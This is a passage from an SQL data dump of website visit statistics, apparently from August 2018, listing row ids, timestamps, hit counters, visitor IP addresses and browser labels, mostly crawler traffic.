,0,'54.36.148.139','other'),(288297,1534316098,1,1,0,0,'216.244.66.241','other'),(288298,1534316111,1,1,0,0,'162.210.196.100','other'),(288299,1534316402,1,1,0,0,'185.40.48.242','chrome'),(288300,1534316769,1,1,0,0,'54.36.148.135','other'),(288301,1534316872,1,1,0,0,'54.36.148.147','other'),(288302,1534317043,1,1,0,0,'178.154.171.88','other'),(288303,1534317053,1,1,0,0,'91.196.178.172','chrome'),(288304,1534317418,1,0,1,0,'66.249.66.74',''),(288305,1534317458,1,1,0,0,'87.21.194.61','other'),(288306,1534317520,1,1,0,0,'54.36.149.4','other'),(288307,1534317957,1,1,0,0,'217.20.184.77','firefox'),(288308,1534318033,1,1,0,0,'40.77.167.70','other'),(288309,1534318537,1,1,0,0,'54.36.149.11','other'),(288310,1534318811,1,1,0,0,'54.36.149.0','other'),(288311,1534318877,1,1,0,0,'141.8.142.74','other'),(288312,1534318914,1,1,0,0,'54.36.148.144','other'),(288313,1534319030,1,1,0,0,'54.36.148.241','other'),(288314,1534319045,1,1,0,0,'54.36.148.40','other'),(288315,1534319245,1,1,0,0,'216.244.66.241','other'),(288316,1534319254,2,2,0,0,'194.37.248.11','chrome'),(288317,1534319318,1,1,0,0,'54.36.149.61','other'),(288318,1534319561,1,1,0,0,'8.29.198.26','other'),(288319,1534319923,1,1,0,0,'54.36.148.141','other'),(288320,1534320019,1,1,0,0,'54.36.148.213','other'),(288321,1534320338,1,1,0,0,'54.36.148.172','other'),(288322,1534320441,1,1,0,0,'54.36.149.95','other'),(288323,1534320506,1,1,0,0,'216.244.66.241','other'),(288324,1534320678,1,1,0,0,'141.8.142.74','other'),(288325,1534321182,1,1,0,0,'54.36.148.41','other'),(288326,1534321190,1,1,0,0,'54.36.148.233','other'),(288327,1534321266,1,1,0,0,'54.36.148.59','other'),(288328,1534321646,1,1,0,0,'8.29.198.25','other'),(288329,1534321694,1,0,1,0,'66.249.66.74',''),(288330,1534321995,1,1,0,0,'54.36.149.35','other'),(288331,1534322192,1,1,0,0,'77.111.244.23','chrome'),(288332,1534322624,1,0,1,0,'66.249.66.157',''),(288333,1534322995,1,1,0,0,'207.46.13.61','other'),(288334,1534323085,1,1,0,0,'37.52.186.45','chrome'),(288335,1534323248,1,1,0,0,'141.8.142.74','other'),(288336,1534323529,1,1,0,0,'54.36.148.131','other'),(288337,1534323585,1,1,0,0,'54.36.148.163','other'),(288338,1534323839,1,1,0,0,'54.36.149.81','other'),(288339,1534323898,1,1,0,0,'54.36.148.19','other'),(288340,1534323923,1,1,0,0,'94.158.95.149','chrome'),(288341,1534324339,1,1,0,0,'213.239.216.194','other'),(288342,1534324606,1,1,0,0,'54.36.148.142','other'),(288343,1534324856,1,1,0,0,'54.36.149.23','other'),(288344,1534325291,1,1,0,0,'91.196.178.169','chrome'),(288345,1534325311,1,1,0,0,'54.36.148.158','other'),(288346,1534325350,1,1,0,0,'54.36.149.58','other'),(288347,1534325432,1,1,0,0,'54.36.148.40','other'),(288348,1534325506,2,2,0,0,'216.244.66.241','other'),(288349,1534325700,1,1,0,0,'54.36.148.88','other'),(288350,1534325909,1,1,0,0,'54.36.148.122','other'),(288351,1534326277,1,1,0,0,'54.36.148.177','other'),(288352,1534326419,1,1,0,0,'54.36.148.218','other'),(288353,1534326601,1,1,0,0,'54.36.148.89','other'),(288354,1534326620,1,1,0,0,'193.19.119.103','firefox'),(288355,1534326635,1,1,0,0,'54.36.148.32','other'),(288356,1534326926,1,1,0,0,'95.163.255.118','other'),(288357,1534326950,1,1,0,0,'54.36.149.63','other'),(288358,1534327129,1,1,0,0,'46.133.62.109','chrome'),(288359,1534327279,1,1,0,0,'54.36.148.94','other'),(288360,1534327389,1,1,0,0,'54.36.148.246','other'),(288361,1534327500,1,1,0,0,'54.36.149.88','other'),(288362,1534327514,1,1,0,0,'54.36.148.138','other'),(288363,1534327622,1,1,0,0,'54.36.148.188','other'),(288364,1534327796,1,1,0,0,'141.8.142.74','other'),(288365,1534327825,1,1,0,0,'54.36.148.66','other'),(288366,1534327930,1,1,0,0,'40.77.167.70','other'),(288367,1534328519,2,2,0,0,'95.213.141.126','opera'),(288368,1534328890,1,1,0,0,'54.36.148.156','other'),(288369,1534329527,1,1,0,0,'157.55.39.90','other'),(288370,1534329640,1,1,0,0,'54.36.149.25','other'),(288371,1534330157,1,1,0,0,'54.36.148.248','other'),(288372,1534330403,1,1,0,0,'8.29.198.26','other'),(288373,1534330604,1,1,0,0,'54.36.148.195','other'),(288374,1534330939,1,1,0,0,'180.76.15.18','other'),(288375,1534331237,1,1,0,0,'54.36.148.15','other'),(288376,1534331435,1,1,0,0,'46.211.122.8','chrome'),(288377,1534331708,1,1,0,0,'54.36.149.17','other'),(288378,1534331981,1,1,0,0,'141.8.142.74','other'),(288379,1534332017,1,1,0,0,'54.36.148.29','other'),(288380,1534332029,1,1,0,0,'54.36.148.140','other'),(288381,1534332373,1,1,0,0,'54.36.149.55','other'),(288382,1534332509,1,1,0,0,'8.29.198.25','other'),(288383,1534332893,1,1,0,0,'54.36.149.98','other'),(288384,1534333046,1,1,0,0,'54.36.148.86','other'),(288385,1534333595,1,1,0,0,'54.36.148.159','other'),(288386,1534334064,1,1,0,0,'157.55.39.90','other'),(288387,1534334263,1,1,0,0,'54.36.149.79','other'),(288388,1534334410,1,1,0,0,'109.206.37.215','chrome'),(288389,1534334753,1,1,0,0,'54.36.149.32','other'),(288390,1534334755,1,1,0,0,'212.90.162.122','firefox'),(288391,1534334793,1,1,0,0,'91.196.178.169','chrome'),(288392,1534334850,1,1,0,0,'91.196.178.77','firefox'),(288393,1534334985,1,1,0,0,'54.36.148.162','other'),(288394,1534335154,1,1,0,0,'54.36.149.52','other'),(288395,1534335330,1,1,0,0,'54.36.148.75','other'),(288396,1534335381,1,1,0,0,'54.36.148.80','other'),(288397,1534335619,1,1,0,0,'54.36.148.85','other'),(288398,1534335773,1,1,0,0,'46.211.25.93','chrome'),(288399,1534335917,1,1,0,0,'94.130.9.183','other'),(288400,1534336204,1,1,0,0,'37.147.246.211','chrome'),(288401,1534336256,1,1,0,0,'54.36.148.98','other'),(288402,1534336653,1,1,0,0,'91.196.178.80','chrome'),(288403,1534336806,1,1,0,0,'54.36.148.12','other'),(288404,1534336814,1,1,0,0,'95.163.255.178','other'),(288405,1534336912,1,1,0,0,'141.8.142.74','other'),(288406,1534337029,1,1,0,0,'91.196.177.46','chrome'),(288407,1534337087,1,1,0,0,'178.154.171.88','other'),(288408,1534337716,1,1,0,0,'54.36.148.55','other'),(288409,1534337867,1,1,0,0,'40.77.167.159','other'),(288410,1534337891,1,1,0,0,'82.207.49.94','chrome'),(288411,1534338110,1,1,0,0,'54.36.148.104','other'),(288412,1534338129,1,1,0,0,'54.36.148.91','other'),(288413,1534338529,1,1,0,0,'141.8.142.74','other'),(288414,1534338602,1,1,0,0,'178.154.171.88','other'),(288415,1534338670,1,1,0,0,'91.196.178.71','firefox'),(288416,1534339569,1,1,0,0,'207.46.13.61','other'),(288417,1534339697,1,1,0,0,'91.196.178.65','chrome'),(288418,1534339786,1,1,0,0,'54.36.148.246','other'),(288419,1534339788,1,1,0,0,'54.165.59.7','other'),(288420,1534339934,2,2,0,0,'91.196.178.130','chrome'),(288421,1534341080,1,1,0,0,'54.36.148.126','other'),(288422,1534341155,1,1,0,0,'216.244.66.241','other'),(288423,1534341243,1,1,0,0,'8.29.198.25','other'),(288424,1534341304,1,1,0,0,'95.163.255.183','other'),(288425,1534341522,1,1,0,0,'95.163.255.187','other'),(288426,1534341664,1,1,0,0,'91.245.124.203','chrome'),(288427,1534341997,1,1,0,0,'54.36.149.88','other'),(288428,1534342025,1,1,0,0,'91.196.178.172','chrome'),(288429,1534342411,1,1,0,0,'54.36.148.21','other'),(288430,1534342496,1,1,0,0,'37.52.186.45','chrome'),(288431,1534342533,1,1,0,0,'141.8.142.74','other'),(288432,1534342604,1,1,0,0,'54.36.148.66','other'),(288433,1534342727,1,1,0,0,'52.53.201.78','chrome'),(288434,1534343372,1,1,0,0,'8.29.198.27','other'),(288435,1534344102,2,2,0,0,'216.244.66.241','other'),(288436,1534344280,1,1,0,0,'95.163.255.165','other'),(288437,1534344311,1,1,0,0,'207.46.13.61','other'),(288438,1534344438,1,1,0,0,'141.8.142.74','other'),(288439,1534344609,1,1,0,0,'54.36.148.50','other'),(288440,1534344965,1,1,0,0,'54.36.148.161','other'),(288441,1534345069,8,8,0,0,'94.130.9.183','other'),(288442,1534345357,1,1,0,0,'54.36.148.190','other'),(288443,1534345547,1,1,0,0,'54.36.148.31','other'),(288444,1534345691,1,1,0,0,'54.36.149.22','other'),(288445,1534345797,1,1,0,0,'95.163.255.151','other'),(288446,1534345983,7,7,0,0,'94.130.9.183','other'),(288447,1534346521,1,1,0,0,'54.36.148.117','other'),(288448,1534346538,86,86,0,0,'54.198.195.11','other'),(288449,1534346912,7,7,0,0,'94.130.9.183','other'),(288450,1534347042,1,1,0,0,'216.244.66.241','other'),(288451,1534347233,1,1,0,0,'54.36.148.236','other'),(288452,1534347285,1,1,0,0,'188.230.43.254','other'),(288453,1534347833,8,8,0,0,'94.130.9.183','other'),(288454,1534348455,1,1,0,0,'141.8.142.74','other'),(288455,1534348750,7,7,0,0,'94.130.9.183','other'),(288456,1534349655,7,7,0,0,'94.130.9.183','other'),(288457,1534349687,1,1,0,0,'188.230.43.254','other'),(288458,1534350218,1,1,0,0,'95.163.255.161','other'),(288459,1534350561,8,8,0,0,'94.130.9.183','other'),(288460,1534350995,1,1,0,0,'92.113.189.235','chrome'),(288461,1534351093,1,1,0,0,'95.163.255.153','other'),(288462,1534351468,7,7,0,0,'94.130.9.183','other'),(288463,1534351622,1,1,0,0,'95.163.255.187','other'),(288464,1534351674,99,99,0,0,'54.92.182.0','other'),(288465,1534351931,1,1,0,0,'95.163.255.157','other'),(288466,1534352082,1,1,0,0,'188.230.43.254','other'),(288467,1534352097,1,1,0,0,'8.29.198.26','other'),(288468,1534352384,5,5,0,0,'40.77.167.147','other'),(288469,1534352395,4,4,0,0,'94.130.9.183','other'),(288470,1534352583,4,4,0,0,'157.55.39.35','other'),(288471,1534352940,1,1,0,0,'207.46.13.117','other'),(288472,1534352944,2,2,0,0,'40.77.167.14','other'),(288473,1534352981,1,1,0,0,'178.154.171.88','other'),(288474,1534353296,4,4,0,0,'94.130.9.183','other'),(288475,1534354162,1,0,1,0,'66.249.66.76',''),(288476,1534354247,1,1,0,0,'8.29.198.26','other'),(288477,1534354276,1,1,0,0,'95.132.28.72','chrome'),(288478,1534354488,1,1,0,0,'188.230.43.254','other'),(288479,1534354564,2,2,0,0,'91.124.182.219','chrome'),(288480,1534355136,1,0,1,0,'66.249.66.74',''),(288481,1534356001,1,1,0,0,'95.163.255.182','other'),(288482,1534356645,1,1,0,0,'95.163.255.195','other'),(288483,1534356886,1,1,0,0,'188.230.43.254','other'),(288484,1534357117,1,1,0,0,'46.211.141.240','other'),(288485,1534357160,1,1,0,0,'40.77.167.147','other'),(288486,1534358422,1,1,0,0,'40.77.167.147','other'),(288487,1534358672,1,1,0,0,'92.112.125.55','other'),(288488,1534358773,1,1,0,0,'66.102.9.136','chrome'),(288489,1534358781,1,1,0,0,'66.102.9.22','chrome'),(288490,1534358988,1,1,0,0,'66.102.9.26','chrome'),(288491,1534359002,1,1,0,0,'212.113.42.142','chrome'),(288492,1534360438,2,2,0,0,'95.132.26.189','chrome'),(288493,1534361382,1,1,0,0,'54.36.148.84','other'),(288494,1534361416,2,2,0,0,'54.36.149.62','other'),(288495,1534361439,1,1,0,0,'95.132.26.189','chrome'),(288496,1534361441,1,1,0,0,'54.36.149.44','other'),(288497,1534361479,1,1,0,0,'54.36.149.61','other'),(288498,1534362167,1,1,0,0,'54.36.149.28','other'),(288499,1534362212,1,1,0,0,'95.163.255.150','other'),(288500,1534362292,1,1,0,0,'54.36.148.184','other'),(288501,1534362364,1,1,0,0,'54.36.148.68','other'),(288502,1534362590,1,1,0,0,'207.46.13.82','other'),(288503,1534362593,2,2,0,0,'91.196.178.35','chrome'),(288504,1534362737,1,1,0,0,'141.8.142.74','other'),(288505,1534362766,1,1,0,0,'54.36.148.232','other'),(288506,1534362940,1,1,0,0,'8.29.198.25','other'),(288507,1534362992,1,1,0,0,'54.36.148.80','other'),(288508,1534362997,1,1,0,0,'54.36.149.54','other'),(288509,1534363002,1,1,0,0,'91.196.178.189','chrome'),(288510,1534363364,1,1,0,0,'54.36.148.171','other'),(288511,1534363455,1,1,0,0,'54.36.148.17','other'),(288512,1534363668,1,1,0,0,'141.8.142.74','other'),(288513,1534363764,1,1,0,0,'54.36.149.53','other'),(288514,1534363932,1,1,0,0,'54.36.148.205','other'),(288515,1534363976,1,1,0,0,'54.36.148.64','other'),(288516,1534363997,1,1,0,0,'95.163.255.195','other'),(288517,1534364141,1,1,0,0,'54.36.149.21','other'),(288518,1534364554,1,1,0,0,'54.36.148.100','other'),(288519,1534364570,1,1,0,0,'54.36.148.207','other'),(288520,1534364943,2,2,0,0,'216.244.66.241','other'),(288521,1534365099,1,1,0,0,'8.29.198.27','other'),(288522,1534365409,1,1,0,0,'54.36.149.80','other'),(288523,1534365434,1,1,0,0,'31.41.70.9','chrome'),(288524,1534365866,1,1,0,0,'54.36.149.99','other'),(288525,1534366043,1,1,0,0,'54.36.148.149','other'),(288526,1534366083,1,1,0,0,'54.36.148.119','other'),(288527,1534366124,1,1,0,0,'54.36.148.69','other'),(288528,1534366127,1,1,0,0,'54.36.148.211','other'),(288529,1534366295,1,1,0,0,'54.36.149.66','other'),(288530,1534366311,1,1,0,0,'54.36.148.163','other'),(288531,1534366470,1,1,0,0,'216.244.66.241','other'),(288532,1534366609,1,1,0,0,'54.36.148.197','other'),(288533,1534366985,1,1,0,0,'54.36.148.125','other'),(288534,1534367118,1,1,0,0,'54.36.148.145','other'),(288535,1534367158,1,1,0,0,'54.36.149.11','other'),(288536,1534367295,1,1,0,0,'54.36.148.17','other'),(288537,1534367602,1,1,0,0,'54.36.149.39','other'),(288538,1534367841,1,1,0,0,'54.36.149.66','other'),(288539,1534368197,1,1,0,0,'141.8.142.74','other'),(288540,1534368235,1,1,0,0,'178.154.171.88','other'),(288541,1534368439,1,1,0,0,'54.36.149.97','other'),(288542,1534368520,1,1,0,0,'54.36.148.170','other'),(288543,1534368661,1,1,0,0,'54.36.149.13','other'),(288544,1534368685,1,1,0,0,'54.36.148.152','other'),(288545,1534368786,1,1,0,0,'95.163.255.156','other'),(288546,1534368788,1,1,0,0,'40.77.167.125','other'),(288547,1534369164,1,1,0,0,'51.255.65.46','other'),(288548,1534369312,1,0,1,0,'66.249.66.156',''),(288549,1534369694,1,1,0,0,'54.36.149.9','other'),(288550,1534369761,4,4,0,0,'46.101.80.192','chrome'),(288551,1534369851,1,1,0,0,'216.244.66.241','other'),(288552,1534370203,1,1,0,0,'54.36.148.196','other'),(288553,1534370306,1,1,0,0,'54.36.148.58','other'),(288554,1534370417,1,1,0,0,'54.36.148.130','other'),(288555,1534370485,1,1,0,0,'95.163.255.179','other'),(288556,1534370898,1,1,0,0,'54.36.148.225','other'),(288557,1534370993,1,1,0,0,'216.244.66.241','other'),(288558,1534371479,1,1,0,0,'54.36.149.105','other'),(288559,1534371494,1,1,0,0,'54.36.149.102','other'),(288560,1534371521,1,1,0,0,'54.36.149.14','other'),(288561,1534371963,1,1,0,0,'87.250.224.85','other'),(288562,1534371992,1,1,0,0,'54.36.149.42','other'),(288563,1534372068,1,1,0,0,'54.36.148.82','other'),(288564,1534372117,1,1,0,0,'54.36.148.18','other'),(288565,1534372298,1,1,0,0,'54.36.148.196','other'),(288566,1534372301,1,1,0,0,'54.36.148.28','other'),(288567,1534372322,1,1,0,0,'216.244.66.241','other'),(288568,1534372524,1,1,0,0,'54.36.148.210','other'),(288569,1534372653,1,1,0,0,'54.36.148.89','other'),(288570,1534372841,1,1,0,0,'79.137.143.174','chrome'),(288571,1534372855,1,1,0,0,'54.36.148.122','other'),(288572,1534372866,1,1,0,0,'54.36.148.80','other'),(288573,1534372980,1,1,0,0,'54.36.148.109','other'),(288574,1534373312,1,1,0,0,'54.36.148.209','other'),(288575,1534373394,1,1,0,0,'54.36.149.4','other'),(288576,1534373423,1,1,0,0,'54.36.148.198','other'),(288577,1534373545,1,1,0,0,'157.55.39.248','other'),(288578,1534373743,1,1,0,0,'141.8.132.19','other'),(288579,1534373777,1,1,0,0,'8.29.198.25','other'),(288580,1534374083,1,1,0,0,'178.154.171.88','other'),(288581,1534374183,1,1,0,0,'54.36.148.164','other'),(288582,1534374228,1,1,0,0,'54.36.148.77','other'),(288583,1534374374,1,1,0,0,'66.249.66.156','chrome'),(288584,1534374499,1,1,0,0,'141.8.142.74','other'),(288585,1534374639,1,1,0,0,'54.36.148.215','other'),(288586,1534374749,1,1,0,0,'54.36.148.98','other'),(288587,1534374838,1,1,0,0,'54.36.149.4','other'),(288588,1534374962,1,1,0,0,'54.36.148.89','other'),(288589,1534375127,2,2,0,0,'216.244.66.241','other'),(288590,1534375134,1,1,0,0,'54.36.148.31','other'),(288591,1534375599,1,1,0,0,'54.36.148.139','other'),(288592,1534375648,1,1,0,0,'54.36.148.199','other'),(288593,1534375942,1,1,0,0,'8.29.198.26','other'),(288594,1534375969,1,1,0,0,'54.36.148.28','other'),(288595,1534375979,1,1,0,0,'54.36.148.11','other'),(288596,1534375980,1,1,0,0,'54.36.149.40','other'),(288597,1534376208,1,1,0,0,'91.209.11.236','other'),(288598,1534376220,1,1,0,0,'142.93.200.89','chrome'),(288599,1534376306,1,1,0,0,'54.36.148.198','other'),(288600,1534376411,1,1,0,0,'54.36.148.236','other'),(288601,1534377062,1,1,0,0,'54.36.148.252','other'),(288602,1534377084,1,1,0,0,'54.36.149.93','other'),(288603,1534377139,1,1,0,0,'178.154.200.41','other'),(288604,1534377144,1,1,0,0,'141.8.142.74','other'),(288605,1534377147,1,1,0,0,'178.154.171.60','other'),(288606,1534377333,1,1,0,0,'54.36.148.133','other'),(288607,1534377507,1,1,0,0,'54.36.148.92','other'),(288608,1534377573,1,1,0,0,'54.36.148.180','other'),(288609,1534377621,1,1,0,0,'95.163.255.164','other'),(288610,1534377953,1,1,0,0,'54.36.148.211','other'),(288611,1534378060,1,1,0,0,'54.36.149.67','other'),(288612,1534378206,1,1,0,0,'54.36.148.143','other'),(288613,1534378380,1,1,0,0,'54.36.148.46','other'),(288614,1534378514,1,1,0,0,'54.36.148.203','other'),(288615,1534378533,1,1,0,0,'54.165.59.7','other'),(288616,1534378539,1,1,0,0,'54.36.148.35','other'),(288617,1534378970,1,1,0,0,'54.36.149.60','other'),(288618,1534379010,1,1,0,0,'54.36.148.188','other'),(288619,1534379019,1,1,0,0,'54.36.149.43','other'),(288620,1534379385,1,1,0,0,'87.250.224.46','other'),(288621,1534379576,1,1,0,0,'54.36.149.20','other'),(288622,1534379623,1,1,0,0,'54.36.148.70','other'),(288623,1534379951,1,1,0,0,'54.36.148.196','other'),(288624,1534380043,1,1,0,0,'54.36.148.246','other'),(288625,1534380241,1,1,0,0,'54.36.148.129','other'),(288626,1534380552,1,1,0,0,'157.55.39.248','other'),(288627,1534380561,1,1,0,0,'54.36.148.211','other'),(288628,1534380599,1,1,0,0,'54.36.148.203','other'),(288629,1534380804,1,1,0,0,'54.36.148.249','other'),(288630,1534380924,1,1,0,0,'54.36.148.47','other'),(288631,1534381014,1,1,0,0,'54.36.148.30','other'),(288632,1534381179,1,1,0,0,'54.36.149.90','other'),(288633,1534381535,1,1,0,0,'54.36.149.45','other'),(288634,1534381953,1,1,0,0,'54.36.148.133','other'),(288635,1534382060,1,1,0,0,'54.36.148.219','other'),(288636,1534382079,1,1,0,0,'54.36.148.51','other'),(288637,1534382215,1,1,0,0,'54.36.148.118','other'),(288638,1534382320,1,1,0,0,'54.36.148.32','other'),(288639,1534382419,1,1,0,0,'216.244.66.241','other'),(288640,1534382532,1,1,0,0,'141.8.142.74','other'),(288641,1534382542,1,1,0,0,'54.36.149.101','other'),(288642,1534382583,1,1,0,0,'54.36.148.77','other'),(288643,1534382834,1,1,0,0,'54.36.149.94','other'),(288644,1534382917,1,1,0,0,'54.36.148.13','other'),(288645,1534383040,1,1,0,0,'54.36.148.228','other'),(288646,1534383153,1,1,0,0,'54.36.149.7','other'),(288647,1534383158,1,1,0,0,'54.36.149.75','other'),(288648,1534383255,2,2,0,0,'148.251.244.137','other'),(288649,1534383347,1,1,0,0,'54.36.148.167','other'),(288650,1534383513,1,1,0,0,'54.36.148.174','other'),(288651,1534383551,1,1,0,0,'40.77.167.125','other'),(288652,1534383594,1,1,0,0,'95.163.255.189','other'),(288653,1534383873,1,1,0,0,'54.36.149.100','other'),(288654,1534383884,1,1,0,0,'54.36.148.100','other'),(288655,1534384327,1,1,0,0,'35.162.70.167','chrome'),(288656,1534384388,2,2,0,0,'37.9.113.115','other'),(288657,1534384552,1,1,0,0,'54.36.148.12','other'),(288658,1534384604,1,1,0,0,'8.29.198.26','other'),(288659,1534384876,1,1,0,0,'54.36.149.69','other'),(288660,1534385230,1,1,0,0,'54.36.148.104','other'),(288661,1534385470,1,1,0,0,'54.36.148.96','other'),(288662,1534385952,1,1,0,0,'54.36.149.106','other'),(288663,1534386077,1,1,0,0,'54.36.149.30','other'),(288664,1534386657,1,1,0,0,'54.36.149.85','other'),(288665,1534386775,1,1,0,0,'8.29.198.26','other'),(288666,1534386984,1,1,0,0,'54.36.149.25','other'),(288667,1534387071,1,1,0,0,'54.36.148.193','other'),(288668,1534387107,2,2,0,0,'216.244.66.241','other'),(288669,1534387122,1,1,0,0,'54.36.148.233','other'),(288670,1534387142,1,1,0,0,'54.36.149.75','other'),(288671,1534387182,1,1,0,0,'54.36.148.127','other'),(288672,1534387237,1,1,0,0,'54.36.148.222','other'),(288673,1534387274,1,1,0,0,'54.36.148.145','other'),(288674,1534388301,1,1,0,0,'54.36.149.8','other'),(288675,1534388310,1,1,0,0,'54.36.149.103','other'),(288676,1534388322,1,1,0,0,'54.36.148.89','other'),(288677,1534388334,1,1,0,0,'54.36.148.128','other'),(288678,1534388453,1,1,0,0,'54.36.148.82','other'),(288679,1534388828,1,1,0,0,'54.36.149.50','other'),(288680,1534388936,1,1,0,0,'54.36.148.228','other'),(288681,1534389013,1,1,0,0,'54.36.148.22','other'),(288682,1534389133,1,1,0,0,'54.36.148.210','other'),(288683,1534389454,1,1,0,0,'54.36.149.48','other'),(288684,1534389457,1,1,0,0,'54.36.149.32','other'),(288685,1534389697,1,1,0,0,'54.36.148.37','other'),(288686,1534389823,1,1,0,0,'216.244.66.241','other'),(288687,1534389990,1,1,0,0,'54.36.149.105','other'),(288688,1534390080,1,1,0,0,'54.36.148.187','other'),(288689,1534390185,1,1,0,0,'54.36.148.198','other'),(288690,1534390326,1,1,0,0,'95.163.255.159','other'),(288691,1534390398,1,1,0,0,'91.196.178.172','chrome'),(288692,1534390427,1,1,0,0,'141.8.142.74','other'),(288693,1534390498,1,1,0,0,'54.36.149.25','other'),(288694,1534390548,1,1,0,0,'54.36.148.86','other'),(288695,1534390626,1,1,0,0,'54.36.148.244','other'),(288696,1534390808,1,1,0,0,'54.36.148.166','other'),(288697,1534390868,1,1,0,0,'54.36.148.215','other'),(288698,1534390874,34,34,0,0,'5.9.108.254','other'),(288699,1534391138,1,1,0,0,'54.36.148.49','other'),(288700,1534391181,1,1,0,0,'91.196.178.186','chrome'),(288701,1534391420,1,1,0,0,'54.36.148.160','other'),(288702,1534391610,1,1,0,0,'54.36.148.236','other'),(288703,1534391751,1,1,0,0,'54.36.148.125','other'),(288704,1534391834,1,1,0,0,'54.36.148.130','other'),(288705,1534392030,1,1,0,0,'54.36.149.26','other'),(288706,1534392367,1,1,0,0,'54.36.148.55','other'),(288707,1534392575,1,1,0,0,'54.36.148.50','other'),(288708,1534392640,1,1,0,0,'54.36.148.251','other'),(288709,1534392681,1,1,0,0,'54.36.148.98','other'),(288710,1534392700,1,1,0,0,'37.9.113.115','other'),(288711,1534392776,2,2,0,0,'54.165.59.7','other'),(288712,1534392884,1,1,0,0,'54.36.148.53','other'),(288713,1534392896,1,1,0,0,'54.36.148.185','other'),(288714,1534393119,1,1,0,0,'199.58.86.206','other'),(288715,1534393149,1,1,0,0,'54.36.148.195','other'),(288716,1534393230,1,1,0,0,'54.36.148.46','other'),(288717,1534393269,1,1,0,0,'54.36.148.29','other'),(288718,1534393280,1,1,0,0,'54.36.148.72','other'),(288719,1534393527,1,1,0,0,'54.36.148.175','other'),(288720,1534393855,1,1,0,0,'54.36.148.114','other'),(288721,1534394234,1,1,0,0,'54.36.149.65','other'),(288722,1534394604,1,1,0,0,'54.36.148.166','other'),(288723,1534394807,1,1,0,0,'54.36.148.171','other'),(288724,1534394938,1,1,0,0,'216.244.66.241','other'),(288725,1534395282,1,1,0,0,'54.36.148.247','other'),(288726,1534395447,1,1,0,0,'8.29.198.25','other'),(288727,1534395472,1,1,0,0,'54.36.148.126','other'),(288728,1534395473,1,1,0,0,'66.249.66.76','chrome'),(288729,1534395604,1,1,0,0,'54.36.149.66','other'),(288730,1534395633,1,1,0,0,'54.165.59.7','other'),(288731,1534395753,1,1,0,0,'54.36.148.38','other'),(288732,1534396270,1,1,0,0,'54.36.149.51','other'),(288733,1534396314,1,1,0,0,'54.36.148.228','other'),(288734,1534396399,1,1,0,0,'54.36.148.95','other'),(288735,1534396477,1,1,0,0,'54.36.148.226','other'),(288736,1534396546,1,1,0,0,'37.9.113.182','other'),(288737,1534396616,2,2,0,0,'178.154.171.88','other'),(288738,1534396932,1,1,0,0,'92.113.189.235','chrome'),(288739,1534397234,1,1,0,0,'54.36.148.158','other'),(288740,1534397297,1,1,0,0,'141.8.142.74','other'),(288741,1534397458,1,1,0,0,'54.36.148.166','other'),(288742,1534397521,1,1,0,0,'54.36.149.33','other'),(288743,1534397605,2,2,0,0,'54.165.59.7','other'),(288744,1534397615,1,1,0,0,'8.29.198.25','other'),(288745,1534397619,1,1,0,0,'54.36.148.163','other'),(288746,1534397682,1,1,0,0,'54.36.148.78','other'),(288747,1534397740,1,1,0,0,'54.36.149.79','other'),(288748,1534397981,1,1,0,0,'157.55.39.248','other'),(288749,1534398180,1,1,0,0,'54.36.149.103','other'),(288750,1534398314,1,1,0,0,'54.36.148.214','other'),(288751,1534398461,1,1,0,0,'178.154.171.88','other'),(288752,1534398603,1,1,0,0,'54.36.148.241','other'),(288753,1534398609,1,1,0,0,'54.36.148.206','other'),(288754,1534398775,1,1,0,0,'54.36.149.100','other'),(288755,1534398812,1,0,1,0,'66.249.66.75',''),(288756,1534398822,1,1,0,0,'54.36.149.72','other'),(288757,1534398860,1,1,0,0,'194.37.248.11','chrome'),(288758,1534399051,1,1,0,0,'54.36.149.84','other'),(288759,1534399058,1,1,0,0,'54.36.149.50','other'),(288760,1534399108,1,1,0,0,'54.36.148.81','other'),(288761,1534399136,1,1,0,0,'173.252.98.22','other'),(288762,1534399138,1,1,0,0,'37.73.129.103','chrome'),(288763,1534399149,1,1,0,0,'54.36.148.232','other'),(288764,1534399272,1,1,0,0,'54.36.149.77','other'),(288765,1534399340,1,1,0,0,'54.36.149.48','other'),(288766,1534399442,1,1,0,0,'54.36.148.202','other'),(288767,1534399933,1,1,0,0,'54.165.59.7','other'),(288768,1534400422,1,0,1,0,'66.249.66.76',''),(288769,1534400476,2,2,0,0,'95.132.33.116','firefox'),(288770,1534400545,1,1,0,0,'54.36.148.146','other'),(288771,1534400647,1,1,0,0,'178.154.171.88','other'),(288772,1534400784,1,1,0,0,'54.36.148.152','other'),(288773,1534400956,1,1,0,0,'54.36.148.24','other'),(288774,1534401030,1,1,0,0,'95.163.255.165','other'),(288775,1534401037,1,1,0,0,'54.36.149.29','other'),(288776,1534401178,1,1,0,0,'54.36.149.64','other'),(288777,1534401282,2,2,0,0,'91.196.178.177','chrome'),(288778,1534401318,1,1,0,0,'185.76.70.150','chrome'),(288779,1534401389,1,1,0,0,'54.36.148.156','other'),(288780,1534401415,1,1,0,0,'54.36.148.211','other'),(288781,1534401900,1,1,0,0,'54.36.148.87','other'),(288782,1534401903,1,1,0,0,'54.36.148.207','other'),(288783,1534402408,1,1,0,0,'194.247.172.15','chrome'),(288784,1534402450,1,0,1,0,'66.249.66.157',''),(288785,1534402624,1,1,0,0,'54.36.148.141','other'),(288786,1534403271,1,1,0,0,'95.163.255.152','other'),(288787,1534403420,2,2,0,0,'91.196.178.84','chrome'),(288788,1534403497,1,1,0,0,'54.36.149.10','other'),(288789,1534403524,1,1,0,0,'40.77.167.125','other'),(288790,1534403585,1,1,0,0,'54.36.148.79','other'),(288791,1534403720,1,1,0,0,'185.76.70.150','chrome'),(288792,1534403765,1,1,0,0,'54.36.149.37','other'),(288793,1534403892,1,1,0,0,'54.36.149.85','other'),(288794,1534404161,1,1,0,0,'178.154.200.41','other'),(288795,1534404216,1,1,0,0,'174.199.20.87','other'),(288796,1534404268,1,1,0,0,'95.163.255.179','other'),(288797,1534404325,1,1,0,0,'141.8.142.74','other'),(288798,1534404666,1,1,0,0,'54.36.149.32','other'),(288799,1534404675,1,1,0,0,'54.36.148.228','other'),(288800,1534404745,2,2,0,0,'40.77.167.14','other'),(288801,1534404750,1,1,0,0,'157.55.39.107','other'),(288802,1534404860,1,1,0,0,'54.36.149.76','other'),(288803,1534404879,1,1,0,0,'178.154.171.88','other'),(288804,1534404973,2,2,0,0,'194.1.195.225','msie'),(288805,1534405091,1,1,0,0,'54.36.148.126','other'),(288806,1534405241,1,1,0,0,'54.36.148.108','other'),(288807,1534405332,1,1,0,0,'54.36.149.86','other'),(288808,1534405514,1,1,0,0,'54.36.149.100','other'),(288809,1534405542,1,1,0,0,'54.36.148.214','other'),(2888